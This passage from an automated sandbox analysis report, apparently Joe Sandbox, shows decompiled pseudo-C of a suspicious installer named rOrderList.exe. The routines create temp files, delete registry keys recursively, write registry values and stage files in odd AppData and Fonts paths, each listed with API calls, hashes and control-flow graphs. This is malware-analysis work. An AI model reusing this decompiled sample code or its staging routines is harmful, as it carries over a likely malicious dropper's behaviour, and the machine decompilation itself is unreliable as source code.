                                                                                      					}
                                                                                      					if(_t23 != 0) {
                                                                                      						continue;
                                                                                      					} else {
                                                                                      						 *_t26 =  *_t26 & _t23;
                                                                                      					}
                                                                                      					L4:
                                                                                      					return _t17;
                                                                                      				}
                                                                                      				_t17 = _t26;
                                                                                      				goto L4;
                                                                                      			}












                                                                                      0x00406067
                                                                                      0x0040606d
                                                                                      0x0040606e
                                                                                      0x0040606e
                                                                                      0x00406073
                                                                                      0x00406074
                                                                                      0x00406077
                                                                                      0x0040607c
                                                                                      0x0040607f
                                                                                      0x00406089
                                                                                      0x00406096
                                                                                      0x0040609a
                                                                                      0x004060a2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004060a6
                                                                                      0x00000000
                                                                                      0x004060a8
                                                                                      0x004060a8
                                                                                      0x004060a8
                                                                                      0x004060ab
                                                                                      0x004060ae
                                                                                      0x004060ae
                                                                                      0x004060b1
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 0040607F
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\rOrderList.exe",004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
                                                                                      • "C:\Users\user\Desktop\rOrderList.exe", xrefs: 00406061
                                                                                      • nsa, xrefs: 0040606E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: "C:\Users\user\Desktop\rOrderList.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-3774381019
                                                                                      • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                      • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
                                                                                      • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                      • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 595 402e41-402e6a call 4063a9 597 402e6f-402e73 595->597 598 402f24-402f28 597->598 599 402e79-402e7d 597->599 600 402ea2-402eb5 599->600 601 402e7f-402ea0 RegEnumValueW 599->601 603 402ede-402ee5 RegEnumKeyW 600->603 601->600 602 402f09-402f17 RegCloseKey 601->602 602->598 604 402eb7-402eb9 603->604 605 402ee7-402ef9 RegCloseKey call 406931 603->605 604->602 606 402ebb-402ecf call 402e41 604->606 611 402f19-402f1f 605->611 612 402efb-402f07 RegDeleteKeyW 605->612 606->605 613 402ed1-402edd 606->613 611->598 612->598 613->603
                                                                                      C-Code - Quality: 48%
                                                                                      			E00402E41(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                      				void* _v8;
                                                                                      				int _v12;
                                                                                      				short _v536;
                                                                                      				void* _t27;
                                                                                      				signed int _t33;
                                                                                      				intOrPtr* _t35;
                                                                                      				signed int _t45;
                                                                                      				signed int _t46;
                                                                                      				signed int _t47;
                                                                                      
                                                                                      				_t46 = _a12;
                                                                                      				_t47 = _t46 & 0x00000300;
                                                                                      				_t45 = _t46 & 0x00000001;
                                                                                      				_t27 = E004063A9(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                                                      				if(_t27 == 0) {
                                                                                      					if((_a12 & 0x00000002) == 0) {
                                                                                      						L3:
                                                                                      						_push(0x105);
                                                                                      						_push( &_v536);
                                                                                      						_push(0);
                                                                                      						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                      							__eflags = _t45;
                                                                                      							if(__eflags != 0) {
                                                                                      								L10:
                                                                                      								RegCloseKey(_v8);
                                                                                      								return 0x3eb;
                                                                                      							}
                                                                                      							_t33 = E00402E41(__eflags, _v8,  &_v536, _a12);
                                                                                      							__eflags = _t33;
                                                                                      							if(_t33 != 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_push(0x105);
                                                                                      							_push( &_v536);
                                                                                      							_push(_t45);
                                                                                      						}
                                                                                      						RegCloseKey(_v8);
                                                                                      						_t35 = E00406931(3);
                                                                                      						if(_t35 != 0) {
                                                                                      							return  *_t35(_a4, _a8, _t47, 0);
                                                                                      						}
                                                                                      						return RegDeleteKeyW(_a4, _a8);
                                                                                      					}
                                                                                      					_v12 = 0;
                                                                                      					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                      						goto L10;
                                                                                      					}
                                                                                      					goto L3;
                                                                                      				}
                                                                                      				return _t27;
                                                                                      			}












                                                                                      0x00402e4c
                                                                                      0x00402e55
                                                                                      0x00402e5e
                                                                                      0x00402e6a
                                                                                      0x00402e73
                                                                                      0x00402e7d
                                                                                      0x00402ea2
                                                                                      0x00402ea8
                                                                                      0x00402ead
                                                                                      0x00402eae
                                                                                      0x00402ede
                                                                                      0x00402eb7
                                                                                      0x00402eb9
                                                                                      0x00402f09
                                                                                      0x00402f0c
                                                                                      0x00000000
                                                                                      0x00402f12
                                                                                      0x00402ec8
                                                                                      0x00402ecd
                                                                                      0x00402ecf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402ed7
                                                                                      0x00402edc
                                                                                      0x00402edd
                                                                                      0x00402edd
                                                                                      0x00402eea
                                                                                      0x00402ef2
                                                                                      0x00402ef9
                                                                                      0x00000000
                                                                                      0x00402f22
                                                                                      0x00000000
                                                                                      0x00402f01
                                                                                      0x00402e8d
                                                                                      0x00402ea0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402ea0
                                                                                      0x00402f28

                                                                                      APIs
                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseEnum$DeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 1354259210-0
                                                                                      • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                                                                                      • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
                                                                                      • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                                                                                      • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 614 402482-4024b3 call 402d3e * 2 call 402dce 621 402bc2-402bd1 614->621 622 4024b9-4024c3 614->622 623 4024c5-4024d2 call 402d3e lstrlenW 622->623 624 4024d6-4024d9 622->624 623->624 627 4024db-4024ec call 402d1c 624->627 628 4024ed-4024f0 624->628 627->628 632 402501-402515 RegSetValueExW 628->632 633 4024f2-4024fc call 403309 628->633 634 402517 632->634 635 40251a-4025fb RegCloseKey 632->635 633->632 634->635 635->621 639 402925-40292c 635->639 639->621
                                                                                      C-Code - Quality: 85%
                                                                                      			E00402482(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                                      				void* _t20;
                                                                                      				void* _t21;
                                                                                      				int _t24;
                                                                                      				long _t25;
                                                                                      				char _t27;
                                                                                      				int _t30;
                                                                                      				void* _t32;
                                                                                      				intOrPtr _t33;
                                                                                      				void* _t34;
                                                                                      				intOrPtr _t37;
                                                                                      				void* _t39;
                                                                                      				void* _t42;
                                                                                      
                                                                                      				_t42 = __eflags;
                                                                                      				_t33 = __edx;
                                                                                      				_t30 = __ebx;
                                                                                      				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                                      				_t34 = __eax;
                                                                                      				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                                      				 *(_t39 - 0x44) = E00402D3E(2);
                                                                                      				_t20 = E00402D3E(0x11);
                                                                                      				 *(_t39 - 4) = 1;
                                                                                      				_t21 = E00402DCE(_t42, _t34, _t20, 2); // executed
                                                                                      				 *(_t39 + 8) = _t21;
                                                                                      				if(_t21 != __ebx) {
                                                                                      					_t24 = 0;
                                                                                      					if(_t37 == 1) {
                                                                                      						E00402D3E(0x23);
                                                                                      						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
                                                                                      					}
                                                                                      					if(_t37 == 4) {
                                                                                      						_t27 = E00402D1C(3);
                                                                                      						_pop(_t32);
                                                                                      						 *0x40b5f8 = _t27;
                                                                                      						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                                      						_t24 = _t37;
                                                                                      					}
                                                                                      					if(_t37 == 3) {
                                                                                      						_t24 = E00403309(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800);
                                                                                      					}
                                                                                      					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24); // executed
                                                                                      					if(_t25 == 0) {
                                                                                      						 *(_t39 - 4) = _t30;
                                                                                      					}
                                                                                      					_push( *(_t39 + 8));
                                                                                      					RegCloseKey(); // executed
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *(_t39 - 4);
                                                                                      				return 0;
                                                                                      			}















                                                                                      0x00402482
                                                                                      0x00402482
                                                                                      0x00402482
                                                                                      0x00402482
                                                                                      0x00402485
                                                                                      0x0040248c
                                                                                      0x00402496
                                                                                      0x00402499
                                                                                      0x004024a2
                                                                                      0x004024a9
                                                                                      0x004024b0
                                                                                      0x004024b3
                                                                                      0x004024b9
                                                                                      0x004024c3
                                                                                      0x004024c7
                                                                                      0x004024d2
                                                                                      0x004024d2
                                                                                      0x004024d9
                                                                                      0x004024dd
                                                                                      0x004024e2
                                                                                      0x004024e3
                                                                                      0x004024e9
                                                                                      0x004024ec
                                                                                      0x004024ec
                                                                                      0x004024f0
                                                                                      0x004024fc
                                                                                      0x004024fc
                                                                                      0x0040250d
                                                                                      0x00402515
                                                                                      0x00402517
                                                                                      0x00402517
                                                                                      0x0040251a
                                                                                      0x004025f5
                                                                                      0x004025f5
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor,00000023,00000011,00000002), ref: 004024CD
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor,00000000,00000011,00000002), ref: 0040250D
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor,00000000,00000011,00000002), ref: 004025F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor
                                                                                      • API String ID: 2655323295-3386201552
                                                                                      • Opcode ID: 3b8212b7241d4efcde36a6188bb85f39d740ee83773d2b12e1f0db153c9896c9
                                                                                      • Instruction ID: c269879d92cf6aad1d98ff003e7813fc443ead00aa0a9254d290d0c4c068a2a6
                                                                                      • Opcode Fuzzy Hash: 3b8212b7241d4efcde36a6188bb85f39d740ee83773d2b12e1f0db153c9896c9
                                                                                      • Instruction Fuzzy Hash: 0311AF71E00108BEDB10AFA5DE49AAEBBB8EF44314F21443AF514F71D1D7B84D419628
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 723 4015c1-4015d5 call 402d3e call 405ebc 728 401631-401634 723->728 729 4015d7-4015ea call 405e3e 723->729 731 401663-4022ee call 401423 728->731 732 401636-401655 call 401423 call 40653c SetCurrentDirectoryW 728->732 738 401604-401607 call 405af0 729->738 739 4015ec-4015ef 729->739 746 402bc2-402bd1 731->746 747 402925-40292c 731->747 732->746 750 40165b-40165e 732->750 748 40160c-40160e 738->748 739->738 740 4015f1-4015f8 call 405b0d 739->740 740->738 754 4015fa-401602 call 405a73 740->754 747->746 751 401610-401615 748->751 752 401627-40162f 748->752 750->746 755 401624 751->755 756 401617-401622 GetFileAttributesW 751->756 752->728 752->729 754->748 755->752 756->752 756->755
                                                                                      C-Code - Quality: 86%
                                                                                      			E004015C1(short __ebx, void* __eflags) {
                                                                                      				void* _t17;
                                                                                      				int _t23;
                                                                                      				void* _t25;
                                                                                      				signed char _t26;
                                                                                      				short _t28;
                                                                                      				short _t31;
                                                                                      				short* _t34;
                                                                                      				void* _t36;
                                                                                      
                                                                                      				_t28 = __ebx;
                                                                                      				 *(_t36 + 8) = E00402D3E(0xfffffff0);
                                                                                      				_t17 = E00405EBC(_t16);
                                                                                      				_t32 = _t17;
                                                                                      				if(_t17 != __ebx) {
                                                                                      					do {
                                                                                      						_t34 = E00405E3E(_t32, 0x5c);
                                                                                      						_t31 =  *_t34;
                                                                                      						 *_t34 = _t28;
                                                                                      						if(_t31 != _t28) {
                                                                                      							L5:
                                                                                      							_t25 = E00405AF0( *(_t36 + 8));
                                                                                      						} else {
                                                                                      							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                      							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B0D(_t42) == 0) {
                                                                                      								goto L5;
                                                                                      							} else {
                                                                                      								_t25 = E00405A73( *(_t36 + 8));
                                                                                      							}
                                                                                      						}
                                                                                      						if(_t25 != _t28) {
                                                                                      							if(_t25 != 0xb7) {
                                                                                      								L9:
                                                                                      								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                      							} else {
                                                                                      								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                      								if((_t26 & 0x00000010) == 0) {
                                                                                      									goto L9;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						 *_t34 = _t31;
                                                                                      						_t32 = _t34 + 2;
                                                                                      					} while (_t31 != _t28);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                      					_push(0xfffffff5);
                                                                                      					E00401423();
                                                                                      				} else {
                                                                                      					E00401423(0xffffffe6);
                                                                                      					E0040653C(L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege\\Willness",  *(_t36 + 8));
                                                                                      					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                      					if(_t23 == 0) {
                                                                                      						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t36 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x004015c1
                                                                                      0x004015c9
                                                                                      0x004015cc
                                                                                      0x004015d1
                                                                                      0x004015d5
                                                                                      0x004015d7
                                                                                      0x004015df
                                                                                      0x004015e1
                                                                                      0x004015e4
                                                                                      0x004015ea
                                                                                      0x00401604
                                                                                      0x00401607
                                                                                      0x004015ec
                                                                                      0x004015ec
                                                                                      0x004015ef
                                                                                      0x00000000
                                                                                      0x004015fa
                                                                                      0x004015fd
                                                                                      0x004015fd
                                                                                      0x004015ef
                                                                                      0x0040160e
                                                                                      0x00401615
                                                                                      0x00401624
                                                                                      0x00401624
                                                                                      0x00401617
                                                                                      0x0040161a
                                                                                      0x00401622
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00401622
                                                                                      0x00401615
                                                                                      0x00401627
                                                                                      0x0040162b
                                                                                      0x0040162c
                                                                                      0x004015d7
                                                                                      0x00401634
                                                                                      0x00401663
                                                                                      0x004022e9
                                                                                      0x00401636
                                                                                      0x00401638
                                                                                      0x00401645
                                                                                      0x0040164d
                                                                                      0x00401655
                                                                                      0x0040165b
                                                                                      0x0040165b
                                                                                      0x00401655
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                        • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50, 4%w.%w,?,77252EE0,00405C6E,?,77253420,77252EE0,00000000), ref: 00405ECA
                                                                                        • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                                                                                        • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                        • Part of subcall function 00405A73: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness,?,00000000,000000F0), ref: 0040164D
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness, xrefs: 00401640
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID: C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness
                                                                                      • API String ID: 1892508949-1530807281
                                                                                      • Opcode ID: 1dbc07150a7b0890d6f2f0031742d4357183754cf59f93a338fe5439ed721fd4
                                                                                      • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
                                                                                      • Opcode Fuzzy Hash: 1dbc07150a7b0890d6f2f0031742d4357183754cf59f93a338fe5439ed721fd4
                                                                                      • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 760 40640a-40643c call 4063a9 763 40647a 760->763 764 40643e-40646c RegQueryValueExW RegCloseKey 760->764 765 40647e-406480 763->765 764->763 766 40646e-406472 764->766 766->765 767 406474-406478 766->767 767->763 767->765
                                                                                      C-Code - Quality: 90%
                                                                                      			E0040640A(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                      				int _v8;
                                                                                      				long _t21;
                                                                                      				long _t24;
                                                                                      				char* _t30;
                                                                                      
                                                                                      				asm("sbb eax, eax");
                                                                                      				_v8 = 0x800;
                                                                                      				_t21 = E004063A9(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                      				_t30 = _a16;
                                                                                      				if(_t21 != 0) {
                                                                                      					L4:
                                                                                      					 *_t30 =  *_t30 & 0x00000000;
                                                                                      				} else {
                                                                                      					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                                                      					_t21 = RegCloseKey(_a20); // executed
                                                                                      					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                      					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                      						goto L4;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t21;
                                                                                      			}







                                                                                      0x00406418
                                                                                      0x0040641a
                                                                                      0x00406432
                                                                                      0x00406437
                                                                                      0x0040643c
                                                                                      0x0040647a
                                                                                      0x0040647a
                                                                                      0x0040643e
                                                                                      0x00406450
                                                                                      0x0040645b
                                                                                      0x00406461
                                                                                      0x0040646c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040646c
                                                                                      0x00406480

                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,00406699,80000002), ref: 00406450
                                                                                      • RegCloseKey.KERNELBASE(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 0040645B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: : Completed
                                                                                      • API String ID: 3356406503-2954849223
                                                                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                      • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
                                                                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                      • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405B25(WCHAR* _a4) {
                                                                                      				struct _PROCESS_INFORMATION _v20;
                                                                                      				int _t7;
                                                                                      
